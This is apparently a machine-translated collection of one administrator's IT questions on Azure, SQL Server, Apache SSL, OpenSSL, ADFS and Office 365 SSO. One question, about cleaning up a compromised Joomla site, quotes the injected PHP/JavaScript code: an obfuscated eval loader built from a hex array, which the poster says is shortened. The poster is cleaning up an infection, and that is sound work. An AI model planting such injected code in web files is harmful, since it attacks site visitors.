Matt Bear's questions

我们在 Azure 中运行了一个未加入域的 SQL 2012 服务器，支持多个网站，本周早些时候出现了一个问题，即加入域的计算机无法登录。没有更新或更改应用于服务器，没有登录错误，提琴手显示没有问题。用户帐户能够从域网络外部登录。

我刚刚在我的 Windows Azure 托管的 Ubuntu 12.04 Apache 服务器上配置了站点以使用 SSL，这些站点正在正常工作并正确重定向。这是我的虚拟主机配置：

<VirtualHost *:80>
ServerName site1.company.com
Redirect permanent / https://site1.company.com/
</VirtualHost>

<VirtualHost *:443>
DocumentRoot /var/www/site1
ServerName site1.company.com
Options -Indexes
DirectoryIndex login.php
SSLEngine on
SSLCertificateFile /etc/apache2/certs/company.com.crt
SSLCertificateKeyFile /etc/apache2/certs/server1.key
SSLCertificateChainFile /etc/apache2/certs/gd_bundle.crt
</VirtualHost>

所有虚拟主机的配置几乎相同。但是，我在 Apache 的错误日志中看到很多条目让我担心生产过程中的性能/问题。

[debug] ssl_engine_kernel.c(1866): OpenSSL: Handshake: start
[debug] ssl_engine_kernel.c(1874): OpenSSL: Loop: before/accept initialization
[debug] ssl_engine_io.c(1908): OpenSSL: I/O error, 11 bytes expected to read on BIO#7f8f746c6ae0     [mem: 7f8f746cc0d0]
[debug] ssl_engine_kernel.c(1903): OpenSSL: Exit: error in unknown state
[info] [client x.x.x.x] (70014)End of file found: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!]
[info] [client x.x.x.x.] Connection closed to child 5 with abortive shutdown (server site1.company.com:443)
[info] [client x.x.x.x] Connection to child 0 established (server site1.company.com:443)
[info] Seeding PRNG with 656 bytes of entropy

此循环每 15 秒重复一次。我是否配置错误？所有站点都可以正常工作，没有错误。

我们一直致力于使用 SharePoint 2013 和 SQL Server 2008R2 企业评估的评估版本将几个 SharePoint 网站开发为 POC。POC 有效，进入了有限的生产阶段，SQL Server 评估的到期日期偷偷溜到我身上并过期了，所以是时候尽快购买了。

理想情况下，由于新的价格模型，我想使用由处理器许可的 SQL Server 2012 Standard。

现在的问题是，我可以从过期的 SQL 2008R2 试用版直接升级到 SQL 2012 标准版吗？

或者更好的是，从过期试用版中导出共享点数据库，这样我就可以将它们导入到全新的 SQL 2012 安装中。

我们的一个旧托管 Joomla 网站遭受了 JavaScript 注入，我正在清理它。以下代码被插入到每个 .php 或 .js 文件中：

<?
#0c0896#
echo " <script type=\"text/javascript\" language=\"javascript\" > bv=(5-3-1);aq=\"0\"+\"x\";sp=\"spli\"+\"t\";ff=String.fromCharCode;w=window;z=\"dy\";try{document[\"\x62o\"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,71,61,58,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1\"[sp](\",\");}w=f;s=[];for(i=2-2;-i+1333!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}</script>";

#/0c0896#
?>

“确切的语法，虽然实际代码要长得多，但我从中间切掉了很多十六进制以使其更容易”

我正在尝试使用 GREP 和 SED 来查找和替换所有文件，但我认为我的 SED 语法不太正确。

grep -rl "4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c" ./ | xargs sed -i 's/<?[.*]#0c0896#[.*]#\/0c0896#[.*]?>//g

我在这里要做的是使用 grep 在所有文件中搜索有效的代码片段，然后使用 SED 替换标签 #0c0896# 以及中间的所有内容。

我们最近被迫将我们的生产云服务器从 GoDaddy 迁移到 Azure，因为 GoDaddy 正在终止他们的云服务器服务。

我们的服务器之一是运行 JasperReports Bitnami 堆栈的 CentOS 5.7。在迁移过程中，我将所有服务器升级到最新的发行版，并从 Ubuntu 12.04LTS 上的 Azure Bitnami Jasper 映像重建 Jasper

A 在 JasperServer 上安装了 SSL 证书并正常工作

所有的新服务器都运行良好，现在问题来了。

我们在 GoDaddy 上也有一个专用的 CentOS 5.8 虚拟服务器（目前），该服务器上有一组站点通过 Soap 提供来自 Jasper 的报告。

但是，尝试连接时握手失败

#openssl s_client -connect newjasperserver.com:443
CONNECTED(00000003)
9092:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:583:

和：

#openssl version
OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008

新服务器正在运行：

#openssl version
OpenSSL 1.0.1c 10 May 2012

现在经过大量研究，OpenSSL < 0.9.8k 和 OpenSSL 1.0.1 之间似乎存在不兼容性。

我确定的选项是：

1. 将服务器迁移到 Azure 上的 CentOS 6.4 服务器（理想，但政治上困难，不要问为什么）

2. 就地升级服务器（不支持，我不想在生产服务器上尝试）

3. 擦除服务器并用 6.4 重建它（可能性，但如果我这样做，我将强制选择选项 1）

4. 从服务器上删除 OpenSSL 并安装更新版本（再一次，我在生产服务器上不适应）

5. 安装 OpenSSL 的第二个实例（我的 #2 选项，但我不确定如何继续）

6. 安装 OpenSSL 的替代品（甚至还没有开始研究这个）

7. 在 Jasper 服务器上禁用强制加密并允许通过 http 连接（这看起来是我最好的临时修复，直到我可以强制将该服务器迁移到 Azure）

有什么我错过的选择吗？Jasper 端有没有办法允许来自旧版 OpenSSL 的连接？

我们有运行 LAMP 堆栈的 Ubuntu 11.10 服务器，它是在我到达这里之前设置的，没有人知道它的用途。我必须迁移它，或者干脆关闭它，但我需要先知道它在做什么。

仔细研究它，没有站点托管在它上面，但是有几个数据库是在 MySQL 中创建的。

所以它可能连接到我们的一个站点，但这里的开发人员都不知道。

我需要做的是查看 MySQL 数据库的连接历史记录，这样我就可以找到连接到它们的内容（如果有的话）。

我正在监视进程列表，但没有看到任何活动连接。

如果 office 365 和 SharePoint SSO 使用不同的 SSL 和域名，我可以使用单个 ADFS 服务器吗？

环境包括：

2 个 DC -- ADFS 服务器 -- ADFS 代理 -- Sharepoint 2010 服务器 (portal.companyname.com) -- 托管 o365 (companynameMail.com)

o365 SSO 目前工作正常（经过大量工作）我想为我们的 SharePoint 服务器添加 SSO。

我不清楚它是否可能，并且坚持在 ADFS 服务器上添加第二个 SSL。

（是的，我将在时间和预算允许的情况下添加冗余服务器）

我们的一个承包商刚刚试图告诉我的老板，我们应该使用我们的 Cisco ASA 来为 DHCP 而不是我们的 DC 提供服务……这有什么好处吗？或者他只是又一次在吹烟。

在文件服务器上的共享文件夹中，对于安全选项卡下的域用户名对象，图标有一个红色的 x。

没有任何症状，用户具有完全访问权限，他们的名字图标上只有一个红色的 x。

为什么是这样？

为了澄清，登录到 windows 2008 r2 文件服务器，浏览到用户共享文件夹，右键单击该文件夹，点击属性，单击安全选项卡。代表用户域名的对象在图标的右下角有一个红色的小x，看起来像一个单身男人。没有任何症状超出我想知道为什么红色 x 在那里。

更新：当您从工作站查看权限时，它不会显示 x，仅在文件服务器上

我有一个用户无法从他的工作站访问文件服务器，他的用户帐户可以从其他机器访问它，我可以使用我在他计算机上的帐户访问它。

我假设它的本地配置文件已损坏？通常我会删除并重新创建配置文件，但是......他是一名开发人员，在他的程序中存储了大量设置，并且至少需要一天可能两天才能重新创建所有内容。

除了重建他的个人资料，我还能做什么？

我只是想找出加载 GPO 的优先顺序。

具体来说，驱动器会在脚本运行之前映射吗？

我在每次用户登录时运行的网络共享中有一个 .exe，但我不知道是否应该通过映射驱动器或网络路径加载它。

我实际上已经找到了解决方案，但我试图了解它失败的原因，以及为什么我的解决方案解决了问题。

我们有一个在web服务器和sql server之间使用表单身份验证的应用程序，web服务器运行server 2008，sql server运行2008 r2，sql server 2008。

8 月，sql server 打上了 .net 3.5.1 补丁，web 服务器未受影响，表单身份验证继续工作。

1 周前，由于硬件故障，我们将 Web 服务器虚拟化到我们的 vSphere 服务器上。之后表单身份验证失败，事件代码 4005，详细代码 50201，提供的票证无效（在 sql server 上）。事实上，sql server 开始生成 Schannel 错误，并且每天开始蓝屏 3-4 次。

在这一点上，我第一次（曾经）接触过 sql server，错误是非特定的，我能找到的任何对它们的引用都与区域警报（我们不运行）或内存错误有关。所以我应用了服务包 1，它停止了蓝屏，但没有修复表单身份验证。

在这一点上，我们有一个变通办法，所以我们在完成另一个项目时把它搁置一旁，昨晚我又重新开始了。

首先是在sql server上的webconfig文件中调整了一些代码，没有，然后是重新生成并更改了机器密钥，仍然没有变化。更新 DNS 服务器，没有变化。

最后我完成并安装了所有 Windows 更新，两次重新启动，（通过 RDP 安装了一个失败的网卡驱动程序，并且没有我的服务器机房密钥，这很有趣）。

之后，表单身份验证再次运行。并且 sql server 停止生成尽可能多的错误，从那以后我得到了两个 schannel 错误。

简而言之，当Web服务器被克隆到虚拟机上时，表单身份验证开始失败，导致sql服务器蓝屏？并形成身份验证失败。并且只能通过对 sql server 应用补丁来修复？（我希望我一次为一个服务器打补丁，这样我就可以确定哪个服务器上的哪个补丁修复了它）。

我的问题是为什么它失败了，为什么打补丁修复了它？我讨厌在没有完全理解原因和方法的情况下修复某些东西。

我需要将站点添加到域中所有计算机上的受信任站点。我可以使用“站点到区域分配列表”来做到这一点，但是当我这样做时，它会锁定客户端计算机上的受信任站点“此设置由您的管理员管理”。我需要的是一种添加站点的方法，使其持久化，并且不影响用户添加自己的受信任站点的能力。（这是一个开发环境，网站会定期创建和测试，他们需要这种能力。）

我正在设置直接访问，并且需要网络位置服务器。是否有关于安装位置的最佳实践？

要求是它只能从内部网访问。所以我在考虑 ADFS 服务器，因为它有 IIS，另一个选择是 AD 控制器。

我可以将 o365 的身份验证模式从 basic 更改为 ntlm 吗？

我遇到一个问题，即当外部用户没有打开 Outlook 时，系统会提示他们在 Lync 中进行 MAPI 登录。

我发现一篇文章http://www.proexchange.be/blogs/lync2010/archive/2012/02/10/microsoft-lync-2010-mapi-com-server-authentication-prompt-explained.aspx解释了这个问题，我找到了如何在交换服务器上执行此操作，但我似乎找不到有关 o365 的任何信息。

我使用 ADFS 服务器和 ADFS 代理为 SSO 完全设置和配置了 ADFS 和 office 365。

对于内部用户，我在 adfs 服务器上配置了 IIS，将 companynamemail.com 重定向到http://Outlook.com/owa/companyname.com，这样用户就不必通过 portal.microsoftonline.com，键入他们的用户名，单击链接，然后登录，他们只需转到 companynamemail.com，并执行 SSO

我正在尝试为外部用户找到一种具有类似体验的方法，我知道他们必须登录，因为他们没有通过域进行身份验证，但我希望他们的门户网站是 companynamemail.com。我尝试使用 adfs 代理进行 http 重定向，但它在不允许他们登录的情况下转发并给出错误。

我正在考虑将重定向写入默认网站，但我想知道是否可以使用重定向或 a/cname 记录来完成。

有人在使用 o365 SSO 的 Server 2012 上安装了 ADFS 2.1 吗？

我让它工作到一定程度，我调整了注册表以允许运行 powershell 命令，用户帐户同步正常。即使是远程连接分析器也没有显示任何错误。但是 SSO 本身似乎没有正确传递凭据。

Microsoft 声称不支持 ADFS 2.1 与 o365 一起使用，但我只是固执己见，并没有那么容易放弃。

我已经和微软通了一个多小时的电话，试图从他们那里得到一个直接的答案，如果我现在准备自己测试一下，我就能找到答案。

我正在按 OU 分阶段部署 o365 SSO，目录同步每 3 小时执行一次。我需要立即进行同步。

“start-onlinecoexistencesync”只会同步那些已经联合的用户，还是会强制所有用户联合？

所以我正在努力将我的公司带入 21 世纪，使用虚拟服务器、活动目录、ADFS、SSO 等。这是一个 huuuuge 项目，未来的目标是通过 ISO 27001 认证。

当前的问题是，Server 2012 提供的直接访问角色是否执行与 Forefront Unified Access Gateway 2010 相同的角色？

我确信存在很多差异，但我主要关心的是 Sharepoint 发布、ADFS 代理、反向代理、远程连接和 o365 同步。

我们正在努力为使用 o365 的 SSO 部署 ADFS。

我们有一家咨询公司来处理我们的防火墙配置。

今天，在试图让他们为我设置一个 DMZ 来安装我的 ADFS 代理服务器时，顾问试图说服我让他们直接打开 443 端口到 ADFS 服务器，并且根本不使用代理。他告诉我，这样的配置现在是标准做法。

由于我们的业务性质，我们有非常严格的安全要求，包括不得对外开放内部服务器。

我的问题是，他只是因为懒惰不想配置 DMZ 才吹口哨，还是他有正当理由？